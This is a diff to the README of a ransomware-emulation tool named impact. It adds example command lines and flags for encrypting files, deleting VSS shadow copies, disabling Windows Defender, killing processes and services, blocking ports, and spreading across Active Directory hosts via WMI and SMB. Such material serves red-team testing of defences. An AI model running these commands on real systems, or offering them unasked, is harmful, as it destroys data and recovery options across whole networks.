joeavanzato/impact/README.md

 impact -directory \\localhost\C$\test -group ransomhub -recursive -cipher xchacha20 -rsa_public "rsa_public.key" -workers 100 -ep 75 -threshold 2048
 # Same as above, but increase the size threshold for automatically encrypting 100% of a file (default 1048 bytes)

+impact -directory * -group play -recursive -workers 50 -ep 40 -killprocs -vss -blockports -killservices -defender -targetad -exec_method wmi
+# Read enabled computers from AD and execute impact remotely with provided parameters via WMI - will also kill configured processes and services, destroy VSS copies and block outbound ports via Windows Firewall
 ```

 ### Arguments
 ```
-  -cipher string
+  -blockhosts
+        Attempt to add configured domains into hosts.etc for redirection - requires admin privileges -blockports
+        Attempt to add configured ports into a Windows Firewall Rule (if enabled) for blocking - requires admin privileges -cipher string
-        Specify Symmetric Cipher for Encryption/Decryption -create bool
+        Specify Symmetric Cipher for Encryption/Decryption -create
         Create a mixture of dummy-data files in the target directory for encryption targeting - when using this, only files created by impact will be targeted for encryption, regardless of existence
   -create_files int
         How many dummy-files to create (default 5000) -create_size int
-        Size in megabytes of dummy-file data to target - distributed evenly across create_files count (default 5000) -decrypt bool
+        Size in megabytes of dummy-file data to target - distributed evenly across create_files count (default 5000) -decrypt
-        Attempt to decrypt using specified options - must include RSA Private Key and Group Name OR Cipher Used -directory string
+        Attempt to decrypt using specified options - must include RSA Private Key and Group Name OR Cipher Used -defender
+        Attempt to disable various aspects of Windows Defender when doing encryption - requires admin privileges -directory string
-        Target Directory - can be UNC Path (\\localhost\C$\test) or Local (C:\test) -ecc_private string
+        Target Directory - can be UNC Path (\\localhost\C$\test) or Local (C:\test) or '*' to indicate local drive enumeration for complete targeting
+  -ecc_private string
         Specify ECC Private-Key File - must be specified with decrypt if asymmetric system is ECC -ecc_public string
         Specify ECC Public-Key File to use - if blank, will use embedded key -ep int
-        Percentage of data to encrypt in each file over the 100%-auto threshold (default 25) -generate_keys
+        Percentage of data to encrypt in each file over the 100%-auto threshold (default 25) -exec_method string
+        How to execute remote copies of impact - wmi, task, service, reg, startup, mmc (default "wmi") -force_extension string
+        Force the use of a specific encryption extension -force_note_name string
+        Force the use of a specific filename for a ransomware note -generate_keys
         If specified, will generate new RSA/ECC keys to use for encryption/decryption purposes -group string
-        Specify a group to emulate - if none selected, will select one at random -killprocs bool
+        Specify a group to emulate - if none selected, will select one at random -killprocs
-        Attempt to stop configured list of process binaries on the target machine prior to encryption -list bool
+        Attempt to stop configured list of process binaries on the target machine prior to encryption - requires admin privileges
+  -killservices
+        Attempt to stop configured list of services - requires admin privileges -list
         List available groups to emulate
   -method string
         inline - Read File, Encrypt in Memory, Write Modifications to Disk; outline - Read File, Encrypt to New File, Delete Original (default "inline")
-  -recursive bool
+  -recursive
-        Whether or not to encrypt all subdirs recursively or not -rsa_private string
+        Whether or not to encrypt all subdirs recursively or not -remotecopypath string
+        If specified, impact will be copied to this location on the remote device - if blank, will use the default ADMIN$ share
+  -rsa_private string
         Specify RSA Private-Key File - must be specified with decrypt if asymmetric system is RSA -rsa_public string
-        Specify RSA Public-Key File to use - if blank, will use embedded key -skipconfirm bool
+        Specify RSA Public-Key File to use - if blank, will use embedded key -skipconfirm
         Skip Directory Confirmation Prompt (be careful!)
-  -threshold int
+  -skipshares
+        If enabled, impact will not target network shares -targetNetworkShares
+        If enabled, impact will target network shares if target_dir == "*" -targetad
+        If enabled, impact will target all enabled computers in the current domain - requires admin privileges -targets value
+        A comma-separated list of hostnames/IP addresses - impact will be copied to the remote device via SMB and executed via the chosen method
+  -targets_file string
+        Specify a file containing line-delimited hostnames/IPs to use as execution targets -threshold int
-        File size in bytes to automatically encrypt 100% of the contents if file Size <= provided number (default 1024) -vss bool
+        File size in bytes to automatically encrypt 100% of the contents if file Size <= provided number (default 1024) -vss
-        Attempt to remove all VSS copies on the target host prior to encryption -workers int
+        Attempt to remove all VSS copies prior to encryption - requires admin privileges -workers int
-        How many goroutines to use for encryption (default 25)
+        How many goroutines to use for encryption - think of this as a limiter for number of concurrent files that can be encrypted/decrypted (default 25)
 ```

 ### Credits/Acknowledgements